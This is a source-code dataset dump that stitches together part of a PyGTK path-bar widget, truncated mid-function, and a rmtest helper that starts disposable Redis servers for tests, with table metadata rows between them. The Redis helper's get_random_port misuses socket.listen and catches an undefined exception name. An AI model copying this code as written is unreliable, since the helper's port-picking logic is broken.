margin += icon_pb.get_width() + self.theme.spacing
# if space is limited and an icon is set, dont draw label
# otherwise, draw label
if w == self.theme.min_part_width and icon_pb:
pass
else:
layout = part.get_layout()
lw, lh = layout.get_pixel_size()
dst_x = x + margin - int(sxO)
dst_y = (self.allocation.height - lh)/2+1
style.paint_layout(
self.window,
self.theme.text_state[state],
False,
(dst_x, dst_y, lw+4, lh), # clip area
self,
None,
dst_x,
dst_y,
layout)
cr.restore()
return
def __draw_part_rtl(self, cr, part, style, r, aw, shapes, sxO=0):
x, y, w, h = part.get_allocation()
shape = part.shape
state = part.state
icon_pb = part.icon.pixbuf
cr.save()
cr.translate(x+sxO, y)
# draw bg
self.__draw_part_bg(cr, part, w, h, state, shape, style,r, aw, shapes)
# determine left margin. left margin depends on part shape
# and whether there exists an icon or not
if shape == self.SHAPE_MID_ARROW or shape == self.SHAPE_END_CAP:
margin = self.theme.arrow_width + self.theme.xpadding
else:
margin = self.theme.xpadding
# draw icon
if icon_pb:
margin += icon_pb.get_width()
cr.set_source_pixbuf(
icon_pb,
w - margin + sxO,
(h - icon_pb.get_height())/2)
cr.paint()
margin += self.spacing
# if space is limited and an icon is set, dont draw label
# otherwise, draw label
if w == self.theme.min_part_width and icon_pb:
pass
else:
layout = part.get_layout()
lw, lh = layout.get_pixel_size()
dst_x = x + part.get_width() - margin - lw + int(sxO)
dst_y = (self.allocation.height - lh)/2+1
style.paint_layout(
self.window,
self.theme.text_state[state],
False,
None,
self,
None,
dst_x,
dst_y,
layout)
cr.restore()
return
def __draw_part_bg(self, cr, part, w, h, state, shape, style, r, aw, shapes):
# outer slight bevel or focal highlight
shapes[shape](cr, 0, 0, w, h, r, aw)
cr.set_source_rgba(0, 0, 0, 0.055)
cr.fill()
# colour scheme dicts
bg = self.theme.bg_colors
outer = self.theme.dark_line_colors
inner = self.theme.light_line_colors
# bg linear vertical gradient
if state != gtk.STATE_PRELIGHT:
color1, color2 = bg[state]
else:
if part != self.get_active():
color1, color2 = bg[self.theme.PRELIT_NORMAL]
else:
color1, color2 = bg[self.theme.PRELIT_ACTIVE]
shapes[shape](cr, 1, 1, w-1, h-1, r, aw)
lin = cairo.LinearGradient(0, 0, 0, h-1)
lin.add_color_stop_rgb(0.0, *color1)
lin.add_color_stop_rgb(1.0, *color2)
cr.set_source(lin)
cr.fill()
cr.set_line_width(1.0)
# strong outline
shapes[shape](cr, 1.5, 1.5, w-1.5, h-1.5, r, aw)
cr.set_source_rgb(*outer[state])
cr.stroke()
# inner bevel/highlight
if self.theme.light_line_colors[state]:
shapes[shape](cr, 2.5, 2.5, w-2.5, h-2.5, r, aw)
r, g, b = inner[state]
cr.set_source_rgba(r, g, b, 0.6)
cr.stroke()
return
def __shape_rect(self, cr, x, y, w, h, r, aw):
global M_PI, PI_OVER_180
cr.new_sub_path()
cr.arc(r+x, r+y, r, M_PI, 270*PI_OVER_180)
cr.arc(w-r, r+y, r, 270*PI_OVER_180, 0)
cr.arc(w-r, h-r, r, 0, 90*PI_OVER_180)
cr.arc(r+x, h-r, r, 90*PI_OVER_180, M_PI)
cr.close_path()
return
def __shape_start_arrow_ltr(self, cr, x, y, w, h, r, aw):
global M_PI, PI_OVER_180
cr.new_sub_path()
cr.arc(r+x, r+y, r, M_PI, 270*PI_OVER_180)
# arrow head
cr.line_to(w-aw+1, y)
cr.line_to(w, (h+y)*0.5)
cr.line_to(w-aw+1, h)
cr.arc(r+x, h-r, r, 90*PI_OVER_180, M_PI)
cr.close_path()
return
def __shape_mid_arrow_ltr(self, cr, x, y, w, h, r, aw):
cr.move_to(-1, y)
# arrow head
cr.line_to(w-aw+1, y)
cr.line_to(w, (h+y)*0.5)
cr.line_to(w-aw+1, h)
cr.line_to(-1, h)
cr.close_path()
return
def __shape_end_cap_ltr(self, cr, x, y, w, h, r, aw):
global M_PI, PI_OVER_180
cr.move_to(-1, y)
cr.arc(w-r, r+y, r, 270*PI_OVER_180, 0)
cr.arc(w-r, h-r, r, 0, 90*PI_OVER_180)
cr.line_to(-1, h)
cr.close_path()
return
def __shape_start_arrow_rtl(self, cr, x, y, w, h, r, aw):
global M_PI, PI_OVER_180
cr.new_sub_path()
cr.move_to(x, (h+y)*0.5)
cr.line_to(aw-1, y)
cr.arc(w-r, r+y, r, 270*PI_OVER_180, 0)
cr.arc(w-r, h-r, r, 0, 90*PI_OVER_180)
cr.line_to(aw-1, h)
cr.close_path()
return
def __shape_mid_arrow_rtl(self, cr, x, y, w, h, r, aw):
cr.move_to(x, (h+y)*0.5)
cr.line_to(aw-1, y)
cr.line_to(w+1, y)
cr.line_to(w+1, h)
cr.line_to(aw-1, h)
cr.close_path()
return
def __shape_end_cap_rtl(self, cr, x, y, w, h, r, aw):
global M_PI, PI_OVER_180
cr.arc(r+x, r+y, r, M_PI, 270*PI_OVER_180)
cr.line_to(w+1, y)
cr.line_to(w+1, h)
cr.arc(r+x, h-r, r, 90*PI_OVER_180, M_PI)
cr.close_path()
return
def __state(self, part):
# returns the idle state of the part depending on
# whether part is active or not.
if part == self.__active_part:
return gtk.STATE_ACTIVE
return gtk.STATE_NORMAL
def __tooltip_check(self, part):
# only show a tooltip if part is truncated, i.e. not all label text is
# visible.
if part.is_truncated():
self.set_has_tooltip(False)
gobject.timeout_add(50, self.__set_tooltip_cb, part.label)
else:
self.set_has_tooltip(False)
return
def __set_tooltip_cb(self, text):
# callback allows the tooltip position to be updated as pointer moves
# accross different parts
self.set_has_tooltip(True)
self.set_tooltip_markup(text)
return False
def __pick_theme(self, name=None):
name = name or gtk.settings_get_default().get_property("gtk-theme-name")
themes = PathBarThemes.DICT
if themes.has_key(name):
return themes[name]()
#print "No styling hints for %s are available" % name
return PathBarThemeHuman()
def __init_drawing(self):
if self.get_direction() != gtk.TEXT_DIR_RTL:
self.__draw_part = self.__draw_part_ltr
self.__shapes = {
self.SHAPE_RECTANGLE : self.__shape_rect,
self.SHAPE_START_ARROW : self.__shape_start_arrow_ltr,
self.SHAPE_MID_ARROW : self.__shape_mid_arrow_ltr,
self.SHAPE_END_CAP : self.__shape_end_cap_ltr}
else:
self.__draw_part = self.__draw_part_rtl
self.__shapes = {
self.SHAPE_RECTANGLE : self.__shape_rect,
self.SHAPE_START_ARROW : self.__shape_start_arrow_rtl,
self.SHAPE_MID_ARROW : self.__shape_mid_arrow_rtl,
self.SHAPE_END_CAP : self.__shape_end_cap_rtl}
return
def __motion_notify_cb(self, widget, event):
if self.__scroll_xO > 0:
return
part = self.__part_at_xy(event.x, event.y)
prev_focal = self.__focal_part
if self.__button_down:
if prev_focal and part != prev_focal:
prev_focal.set_state(self.__state(prev_focal))
self.queue_draw_area(*prev_focal.get_allocation_tuple())
return
self.__button_down = False
if part and part.state != gtk.STATE_PRELIGHT:
self.__tooltip_check(part)
part.set_state(gtk.STATE_PRELIGHT)
if prev_focal:
prev_focal.set_state(self.__state(prev_focal))
self.queue_draw_area(*prev_focal.get_allocation_tuple())
self.__focal_part = part
self.queue_draw_area(*part.get_allocation_tuple())
elif not part and prev_focal != None:
prev_focal.set_state(self.__state(prev_focal))
self.queue_draw_area(*prev_focal.get_allocation_tuple())
self.__focal_part = None
return
def __leave_notify_cb(self, widget, event):
self.__button_down = False
prev_focal = self.__focal_part
if prev_focal:
prev_focal.set_state(self.__state(prev_focal))
self.queue_draw_area(*prev_focal.get_allocation_tuple())
self.__focal_part = None
return
def __button_press_cb(self, widget, event):
self.__button_down = True
part = self.__part_at_xy(event.x, event.y)
if part:
part.set_state(gtk.STATE_SELECTED)
self.queue_draw_area(*part.get_allocation_tuple())
return
def __button_release_cb(self, widget, event):
part = self.__part_at_xy(event.x, event.y)
if self.__focal_part and self.__focal_part != part:
pass
elif part and self.__button_down:
self.grab_focus()
prev_active, redraw = self.__set_active(part)
part.set_state(gtk.STATE_PRELIGHT)
self.queue_draw_area(*part.get_allocation_tuple())
if redraw:
self.queue_draw_area(*prev_active.get_allocation_tuple())
self.__button_down = False
return
# def __key_release_cb(self, widget, event):
# part = None
# # left key pressed
# if event.keyval == 65363:
# part = self.get_left_part()
# # right key pressed
# elif event.keyval == 65361:
# part = self.get_right_part()
# if not part: return
# prev_active = self.set_active(part)
# self.queue_draw_area(*part.allocation)
# if prev_active:
# self.queue_draw_area(*prev_active.allocation)
# part.emit("clicked", event.copy())
# return
def __realize_cb(self, widget):
self.theme.load(widget.style)
return
def __expose_cb(self, widget, event):
cr = widget.window.cairo_create()
if self.theme.base_hack:
cr.set_source_rgb(*self.theme.base_hack)
cr.paint()
if self.__scroll_xO:
self.__draw_hscroll(cr)
else:
self.__draw_all(cr, event.area)
del cr
return
def __style_change_cb(self, widget, old_style):
# when alloc.width == 1, this is typical of an unallocated widget,
# lets not break a sweat for nothing...
if self.allocation.width == 1:
return
self.theme = self.__pick_theme()
self.theme.load(widget.style)
# set height to 0 so that if part height has been reduced the widget will
# shrink to an appropriate new height based on new font size
self.set_size_request(-1, 28)
parts = self.__parts
self.__parts = []
# recalc best fits, re-append then draw all
for part in parts:
if part.icon.pixbuf:
part.icon.load_pixbuf()
part.calc_size_requisition()
self.__append(part)
self.queue_draw()
return
def __allocation_change_cb(self, widget, allocation):
if allocation.width == 1:
return
path_w = self.__draw_width()
if path_w == allocation.width:
return
elif path_w > allocation.width:
self.__shrink_check(allocation)
else:
self.__grow_check(allocation.width, allocation)
self.queue_draw()
return
class PathPart:
def __init__(self, id, label=None, callback=None, obj=None):
self.__requisition = (0,0)
self.__layout = None
self.__pbar = None
self.id = id
self.allocation = [0, 0, 0, 0]
self.state = gtk.STATE_NORMAL
self.shape = PathBar.SHAPE_RECTANGLE
self.callback = callback
self.obj = obj
self.set_label(label or "")
self.icon = PathBarIcon()
return
def set_callback(self, cb):
self.callback = cb
return
def set_label(self, label):
# escape special characters
label = gobject.markup_escape_text(label.strip())
# some hackery to preserve italics markup
label = label.replace('<i>', '<i>').replace('</i>', '</i>')
self.label = label
return
def set_icon(self, stock_icon, size=gtk.ICON_SIZE_BUTTON):
self.icon.specify(stock_icon, size)
self.icon.load_pixbuf()
return
def set_state(self, gtk_state):
self.state = gtk_state
return
def set_shape(self, shape):
self.shape = shape
return
def set_x(self, x):
self.allocation[0] = int(x)
return
def set_size(self, w, h):
if w != -1: self.allocation[2] = int(w)
if h != -1: self.allocation[3] = int(h)
self.__calc_layout_width(self.__layout, self.shape, self.__pbar)
return
def set_pathbar(self, path_bar):
self.__pbar = path_bar
return
def get_x(self):
return self.allocation[0]
def get_width(self):
return self.allocation[2]
def get_height(self):
return self.allocation[3]
def get_label(self):
return self.label
def get_allocation(self):
return gtk.gdk.Rectangle(*self.get_allocation_tuple())
def get_allocation_tuple(self):
if self.__pbar.get_direction() != gtk.TEXT_DIR_RTL:
return self.allocation
x, y, w, h = self.allocation
x = self.__pbar.allocation[2]-x-w
return x, y, w, h
def get_size_requisition(self):
return self.__requisition
def get_layout(self):
return self.__layout
def activate(self):
self.__pbar.set_active(self)
return
def calc_size_requisition(self):
pbar = self.__pbar
# determine widget size base on label width
self.__layout = self.__layout_text(self.label, pbar.get_pango_context())
extents = self.__layout.get_pixel_extents()
# calc text width + 2 * padding, text height + 2 * ypadding
w = extents[1][2] + 2*pbar.theme.xpadding
h = max(extents[1][3] + 2*pbar.theme.ypadding, pbar.get_size_request()[1])
# if has icon add some more pixels on
if self.icon.pixbuf:
w += self.icon.pixbuf.get_width() + pbar.theme.spacing
h = max(self.icon.pixbuf.get_height() + 2*pbar.theme.ypadding, h)
# extend width depending on part shape ...
if self.shape == PathBar.SHAPE_START_ARROW or \
self.shape == PathBar.SHAPE_END_CAP:
w += pbar.theme.arrow_width
elif self.shape == PathBar.SHAPE_MID_ARROW:
w += 2*pbar.theme.arrow_width
# if height greater than current height request,
# reset height request to higher value
# i get the feeling this should be in set_size_request(), but meh
if h > pbar.get_size_request()[1]:
pbar.set_size_request(-1, h)
self.__requisition = (w,h)
return w, h
def is_truncated(self):
return self.__requisition[0] != self.allocation[2]
def __layout_text(self, text, pango_context):
layout = pango.Layout(pango_context)
layout.set_markup('%s' % text)
layout.set_ellipsize(pango.ELLIPSIZE_END)
return layout
def __calc_layout_width(self, layout, shape, pbar):
# set layout width
if self.icon.pixbuf:
icon_w = self.icon.pixbuf.get_width() + pbar.theme.spacing
else:
icon_w = 0
w = self.allocation[2]
if shape == PathBar.SHAPE_MID_ARROW:
layout.set_width((w - 2*pbar.theme.arrow_width -
2*pbar.theme.xpadding - icon_w)*pango.SCALE)
elif shape == PathBar.SHAPE_START_ARROW or \
shape == PathBar.SHAPE_END_CAP:
layout.set_width((w - pbar.theme.arrow_width - 2*pbar.theme.xpadding -
icon_w)*pango.SCALE)
else:
layout.set_width((w - 2*pbar.theme.xpadding - icon_w)*pango.SCALE)
return
class PathBarIcon:
def __init__(self, name=None, size=None):
self.name = name
self.size = size
self.pixbuf = None
return
def specify(self, name, size):
self.name = name
self.size = size
return
def load_pixbuf(self):
if not self.name:
print 'Error: No icon specified.'
return
if not self.size:
print 'Note: No icon size specified.'
def render_icon(icon_set, name, size):
self.pixbuf = icon_set.render_icon(
style,
gtk.TEXT_DIR_NONE,
gtk.STATE_NORMAL,
self.size or gtk.ICON_SIZE_BUTTON,
gtk.Image(),
None)
return
style = gtk.Style()
icon_set = style.lookup_icon_set(self.name)
if not icon_set:
t = gtk.icon_theme_get_default()
self.pixbuf = t.lookup_icon(self.name, self.size, 0).load_icon()
else:
icon_set = style.lookup_icon_set(self.name)
render_icon(icon_set, self.name, self.size)
if not self.pixbuf:
print 'Error: No name failed to match any installed icon set.'
self.name = gtk.STOCK_MISSING_IMAGE
icon_set = style.lookup_icon_set(self.name)
render_icon(icon_set, self.name, self.size)
return
class PathBarThemeHuman:
PRELIT_NORMAL = 10
PRELIT_ACTIVE = 11
curvature = 2.5
min_part_width = 56
xpadding = 8
ypadding = 2
spacing = 4
arrow_width = 13
scroll_duration_ms = 150
scroll_fps = 50
animate = gtk.settings_get_default().get_property("gtk-enable-animations")
def __init__(self):
return
def load(self, style):
mid = style.mid
dark = style.dark
light = style.light
text = style.text
active = rgb.mix_color(mid[gtk.STATE_NORMAL],
mid[gtk.STATE_SELECTED], 0.25)
self.bg_colors = {
gtk.STATE_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.2)),
f(mid[gtk.STATE_NORMAL])),
gtk.STATE_ACTIVE: (f(rgb.shade(active, 1.2)),
f(active)),
gtk.STATE_SELECTED: (f(mid[gtk.STATE_ACTIVE]),
f(mid[gtk.STATE_ACTIVE])),
self.PRELIT_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.25)),
f(rgb.shade(mid[gtk.STATE_NORMAL], 1.05))),
self.PRELIT_ACTIVE: (f(rgb.shade(active, 1.25)),
f(rgb.shade(active, 1.05)))
}
self.dark_line_colors = {
gtk.STATE_NORMAL: f(dark[gtk.STATE_NORMAL]),
gtk.STATE_ACTIVE: f(dark[gtk.STATE_ACTIVE]),
gtk.STATE_SELECTED: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.9)),
gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
}
self.light_line_colors = {
gtk.STATE_NORMAL: f(light[gtk.STATE_NORMAL]),
gtk.STATE_ACTIVE: f(light[gtk.STATE_ACTIVE]),
gtk.STATE_SELECTED: None,
gtk.STATE_PRELIGHT: f(light[gtk.STATE_PRELIGHT])
}
self.text_state = {
gtk.STATE_NORMAL: gtk.STATE_NORMAL,
gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
gtk.STATE_SELECTED: gtk.STATE_ACTIVE,
gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
}
self.base_hack = None
return
class PathBarThemeHumanClearlooks(PathBarThemeHuman):
def __init__(self):
PathBarThemeHuman.__init__(self)
return
def __init__(self):
return
def load(self, style):
mid = style.mid
dark = style.dark
light = style.light
text = style.text
active = rgb.mix_color(mid[gtk.STATE_NORMAL],
mid[gtk.STATE_SELECTED], 0.25)
self.bg_colors = {
gtk.STATE_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.20)),
f(rgb.shade(mid[gtk.STATE_NORMAL], 1.05))),
gtk.STATE_ACTIVE: (f(rgb.shade(active, 1.20)),
f(rgb.shade(active, 1.05))),
gtk.STATE_SELECTED: (f(rgb.shade(mid[gtk.STATE_ACTIVE], 1.15)),
f(mid[gtk.STATE_ACTIVE])),
self.PRELIT_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.35)),
f(rgb.shade(mid[gtk.STATE_NORMAL], 1.15))),
self.PRELIT_ACTIVE: (f(rgb.shade(active, 1.35)),
f(rgb.shade(active, 1.15)))
}
self.dark_line_colors = {
gtk.STATE_NORMAL: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.975)),
gtk.STATE_ACTIVE: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.975)),
gtk.STATE_SELECTED: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
}
self.light_line_colors = {
gtk.STATE_NORMAL: None,
gtk.STATE_ACTIVE: None,
gtk.STATE_SELECTED: f(mid[gtk.STATE_ACTIVE]),
gtk.STATE_PRELIGHT: f(light[gtk.STATE_PRELIGHT])
}
self.text_state = {
gtk.STATE_NORMAL: gtk.STATE_NORMAL,
gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
gtk.STATE_SELECTED: gtk.STATE_NORMAL,
gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
}
self.base_hack = None
return
class PathBarThemeDust(PathBarThemeHuman):
def __init__(self):
PathBarThemeHuman.__init__(self)
return
def load(self, style):
mid = style.mid
dark = style.dark
light = style.light
text = style.text
active = rgb.mix_color(mid[gtk.STATE_NORMAL],
light[gtk.STATE_SELECTED], 0.3)
self.bg_colors = {
gtk.STATE_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.3)),
f(mid[gtk.STATE_NORMAL])),
gtk.STATE_ACTIVE: (f(rgb.shade(active, 1.3)),
f(active)),
gtk.STATE_SELECTED: (f(rgb.shade(mid[gtk.STATE_NORMAL], 0.95)),
f(rgb.shade(mid[gtk.STATE_NORMAL], 0.95))),
self.PRELIT_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.35)),
f(rgb.shade(mid[gtk.STATE_NORMAL], 1.15))),
self.PRELIT_ACTIVE: (f(rgb.shade(active, 1.35)),
f(rgb.shade(active, 1.15)))
}
self.dark_line_colors = {
gtk.STATE_NORMAL: f(dark[gtk.STATE_ACTIVE]),
gtk.STATE_ACTIVE: f(dark[gtk.STATE_ACTIVE]),
gtk.STATE_SELECTED: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
}
self.light_line_colors = {
gtk.STATE_NORMAL: f(light[gtk.STATE_NORMAL]),
gtk.STATE_ACTIVE: f(light[gtk.STATE_NORMAL]),
gtk.STATE_SELECTED: None,
gtk.STATE_PRELIGHT: f(light[gtk.STATE_PRELIGHT])
}
self.text_state = {
gtk.STATE_NORMAL: gtk.STATE_NORMAL,
gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
gtk.STATE_SELECTED: gtk.STATE_NORMAL,
gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
}
self.base_hack = None
return
class PathBarThemeNewWave(PathBarThemeHuman):
curvature = 1.5
def __init__(self):
PathBarThemeHuman.__init__(self)
return
def load(self, style):
mid = style.mid
dark = style.dark
light = style.light
text = style.text
active = rgb.mix_color(mid[gtk.STATE_NORMAL],
light[gtk.STATE_SELECTED], 0.5)
self.bg_colors = {
gtk.STATE_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.01)),
f(mid[gtk.STATE_NORMAL])),
gtk.STATE_ACTIVE: (f(rgb.shade(active, 1.01)),
f(active)),
gtk.STATE_SELECTED: (f(rgb.shade(mid[gtk.STATE_NORMAL], 0.95)),
f(rgb.shade(mid[gtk.STATE_NORMAL], 0.95))),
self.PRELIT_NORMAL: (f(rgb.shade(mid[gtk.STATE_NORMAL], 1.2)),
f(rgb.shade(mid[gtk.STATE_NORMAL], 1.15))),
self.PRELIT_ACTIVE: (f(rgb.shade(active, 1.2)),
f(rgb.shade(active, 1.15)))
}
self.dark_line_colors = {
gtk.STATE_NORMAL: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
gtk.STATE_ACTIVE: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
gtk.STATE_SELECTED: f(rgb.shade(dark[gtk.STATE_ACTIVE], 0.95)),
gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
}
self.light_line_colors = {
gtk.STATE_NORMAL: f(rgb.shade(light[gtk.STATE_NORMAL], 1.2)),
gtk.STATE_ACTIVE: f(rgb.shade(light[gtk.STATE_NORMAL], 1.2)),
gtk.STATE_SELECTED: None,
gtk.STATE_PRELIGHT: f(rgb.shade(light[gtk.STATE_PRELIGHT], 1.2))
}
self.text_state = {
gtk.STATE_NORMAL: gtk.STATE_NORMAL,
gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
gtk.STATE_SELECTED: gtk.STATE_NORMAL,
gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
}
self.base_hack = f(gtk.gdk.color_parse("#F2F2F2"))
return
class PathBarThemeHicolor:
PRELIT_NORMAL = 10
PRELIT_ACTIVE = 11
curvature = 0.5
min_part_width = 56
xpadding = 15
ypadding = 10
spacing = 10
arrow_width = 15
scroll_duration_ms = 150
scroll_fps = 50
animate = gtk.settings_get_default().get_property("gtk-enable-animations")
def __init__(self):
return
def load(self, style):
mid = style.mid
dark = style.dark
light = style.light
text = style.text
self.bg_colors = {
gtk.STATE_NORMAL: (f(mid[gtk.STATE_NORMAL]),
f(mid[gtk.STATE_NORMAL])),
gtk.STATE_ACTIVE: (f(mid[gtk.STATE_ACTIVE]),
f(mid[gtk.STATE_ACTIVE])),
gtk.STATE_SELECTED: (f(mid[gtk.STATE_SELECTED]),
f(mid[gtk.STATE_SELECTED])),
self.PRELIT_NORMAL: (f(mid[gtk.STATE_PRELIGHT]),
f(mid[gtk.STATE_PRELIGHT])),
self.PRELIT_ACTIVE: (f(mid[gtk.STATE_PRELIGHT]),
f(mid[gtk.STATE_PRELIGHT]))
}
self.dark_line_colors = {
gtk.STATE_NORMAL: f(dark[gtk.STATE_NORMAL]),
gtk.STATE_ACTIVE: f(dark[gtk.STATE_ACTIVE]),
gtk.STATE_SELECTED: f(dark[gtk.STATE_SELECTED]),
gtk.STATE_PRELIGHT: f(dark[gtk.STATE_PRELIGHT])
}
self.light_line_colors = {
gtk.STATE_NORMAL: f(light[gtk.STATE_NORMAL]),
gtk.STATE_ACTIVE: f(light[gtk.STATE_ACTIVE]),
gtk.STATE_SELECTED: None,
gtk.STATE_PRELIGHT: f(light[gtk.STATE_PRELIGHT])
}
self.text_state = {
gtk.STATE_NORMAL: gtk.STATE_NORMAL,
gtk.STATE_ACTIVE: gtk.STATE_ACTIVE,
gtk.STATE_SELECTED: gtk.STATE_SELECTED,
gtk.STATE_PRELIGHT: gtk.STATE_PRELIGHT
}
self.base_hack = None
return
class PathBarThemes:
DICT = {
"Human": PathBarThemeHuman,
"Human-Clearlooks": PathBarThemeHumanClearlooks,
"HighContrastInverse": PathBarThemeHicolor,
"HighContrastLargePrintInverse": PathBarThemeHicolor,
"Dust": PathBarThemeDust,
"Dust Sand": PathBarThemeDust,
"New Wave": PathBarThemeNewWave
}
class NavigationBar(PathBar):
def __init__(self, group=None):
PathBar.__init__(self)
self.set_size_request(-1, 28)
self.id_to_part = {}
return
def add_with_id(self, label, callback, id, obj, icon=None):
"""
Add a new button with the given label/callback
If there is the same id already, replace the existing one
with the new one
"""
if label == self.last_label:
#ignoring duplicate
return
#print "Adding %s(%d)" % (label, id)
# check if we have the button of that id or need a new one
if id == 1 and len(self.id_to_part) > 0:
# We already have the first item, just don't do anything
return
else:
for i in self.id_to_part:
part = self.id_to_part[i]
if part.id >= id:
self.remove(part)
part = PathPart(id, label, callback, obj)
part.set_pathbar(self)
self.id_to_part[id] = part
gobject.timeout_add(150, self.append, part)
if icon: part.set_icon(icon)
self.last_label = label
return
def remove_id(self, id):
if not id in self.id_to_part:
return
part = self.id_to_part[id]
del self.id_to_part[id]
self.remove(part)
self.last_label = None
return
def remove_all(self):
"""remove all elements"""
self.__parts = []
self.id_to_part = {}
self.queue_draw()
self.last_label = None
return
def get_button_from_id(self, id):
"""
return the button for the given id (or None)
"""
if not id in self.id_to_part:
return None
return self.id_to_part[id]
def get_label(self, id):
"""
Return the label of the navigation button with the given id
"""
if not id in self.id_to_part:
return
| 30.763752 | 86 | 0.562799 | 42,713 | 0.979139 | 0 | 0 | 0 | 0 | 0 | 0 | 5,695 | 0.13055 |
6349977120b1f7e73c34cb0ef18c1955caa9b170 | 5,971 | py | Python | .venv/lib/python3.8/site-packages/rmtest/disposableredis/__init__.py | nuruddinsayeed/ru102py | ef43464a93dd74e24f9447ed5014acb35b9a650e | [
"MIT"
] | null | null | null | .venv/lib/python3.8/site-packages/rmtest/disposableredis/__init__.py | nuruddinsayeed/ru102py | ef43464a93dd74e24f9447ed5014acb35b9a650e | [
"MIT"
] | null | null | null | .venv/lib/python3.8/site-packages/rmtest/disposableredis/__init__.py | nuruddinsayeed/ru102py | ef43464a93dd74e24f9447ed5014acb35b9a650e | [
"MIT"
] | null | null | null | import subprocess
import socket
import redis
import time
import os
import os.path
import sys
import warnings
import random
REDIS_DEBUGGER = os.environ.get('REDIS_DEBUGGER', None)
REDIS_SHOW_OUTPUT = int(os.environ.get(
'REDIS_VERBOSE', 1 if REDIS_DEBUGGER else 0))
def get_random_port():
while True:
port = random.randrange(1025, 10000)
sock = socket.socket()
try:
sock.listen(port)
except Error:
continue
#_, port = sock.getsockname()
sock.close()
return port
class Client(redis.StrictRedis):
def __init__(self, disposable_redis, port):
redis.StrictRedis.__init__(self, port=port)
self.dr = disposable_redis
def retry_with_rdb_reload(self):
yield 1
self.dr.dump_and_reload()
yield 2
class DisposableRedis(object):
def __init__(self, port=None, path='redis-server', **extra_args):
"""
:param port: port number to start the redis server on.
Specify none to automatically generate
:type port: int|None
:param extra_args: any extra arguments kwargs will
be passed to redis server as --key val
"""
self._port = port
# this will hold the actual port the redis is listening on.
# It's equal to `_port` unless `_port` is None
# in that case `port` is randomly generated
self.port = None
self._is_external = True if port else False
self.use_aof = extra_args.pop('use_aof', False)
self.extra_args = []
for k, v in extra_args.items():
self.extra_args.append('--%s' % k)
if isinstance(v, (list, tuple)):
self.extra_args += list(v)
else:
self.extra_args.append(v)
self.path = path
self.errored = False
self.dumpfile = None
self.aoffile = None
self.pollfile = None
self.process = None
def force_start(self):
self._is_external = False
def _get_output(self):
if not self.process:
return ''
return '' if REDIS_SHOW_OUTPUT else self.process.stdout.read()
def _start_process(self):
if self._is_external:
return
if REDIS_DEBUGGER:
debugger = REDIS_DEBUGGER.split()
args = debugger + self.args
else:
args = self.args
stdout = None if REDIS_SHOW_OUTPUT else subprocess.PIPE
if REDIS_SHOW_OUTPUT:
sys.stderr.write("Executing: {}".format(repr(args)))
self.process = subprocess.Popen(
args,
stdin=sys.stdin,
stdout=stdout,
stderr=sys.stderr,
)
begin = time.time()
while True:
try:
self.client().ping()
break
except (redis.ConnectionError, redis.ResponseError):
self.process.poll()
if self.process.returncode is not None:
raise RuntimeError(
"Process has exited with code {}\n. Redis output: {}"
.format(self.process.returncode, self._get_output()))
if time.time() - begin > 300:
raise RuntimeError(
'Cannot initialize client (waited 5mins)')
time.sleep(0.1)
def start(self):
"""
Start the server. To stop the server you should call stop()
accordingly
"""
if self._port is None:
self.port = get_random_port()
else:
self.port = self._port
if not self.dumpfile:
self.dumpfile = 'dump.%s.rdb' % self.port
if not self.aoffile:
self.aoffile = 'appendonly.%s.aof' % self.port
self.args = [self.path,
'--port', str(self.port),
'--save', '',
'--dbfilename', self.dumpfile]
if self.use_aof:
self.args += ['--appendonly', 'yes',
'--appendfilename', self.aoffile]
self.args += self.extra_args
self._start_process()
def _cleanup_files(self):
for f in (self.aoffile, self.dumpfile):
try:
os.unlink(f)
except OSError:
pass
def stop(self, for_restart=False):
if self._is_external:
return
self.process.terminate()
if not for_restart:
self._cleanup_files()
def __enter__(self):
self.start()
return self.client()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
if exc_val or self.errored:
sys.stderr.write("Redis output: {}\n".format(self._get_output()))
def _wait_for_child(self):
# Wait until file is available
r = self.client()
while True:
info = r.info('persistence')
if info['aof_rewrite_scheduled'] or info['aof_rewrite_in_progress']:
time.sleep(0.1)
else:
break
def dump_and_reload(self, restart_process=False):
"""
Dump the rdb and reload it, to test for serialization errors
"""
conn = self.client()
if restart_process:
if self._is_external:
warnings.warn('Tied to an external process. Cannot restart')
return
import time
conn.bgrewriteaof()
self._wait_for_child()
self.stop(for_restart=True)
self.start()
else:
conn.save()
try:
conn.execute_command('DEBUG', 'RELOAD')
except redis.RedisError as err:
self.errored = True
raise err
def client(self):
"""
:rtype: redis.StrictRedis
"""
return Client(self, self.port)
| 28.433333 | 80 | 0.54212 | 5,412 | 0.906381 | 98 | 0.016413 | 0 | 0 | 0 | 0 | 1,126 | 0.188578 |
634aec23f0d6252efab55e311a6bc96d9c7f0eb3 | 16,843 | py | Python | disco_aws_automation/disco_autoscale.py | Angakkuq/asiaq-aws | f7ddec9fc60aef685f372cbaefee2b08ae18b6a0 | [
"BSD-2-Clause"
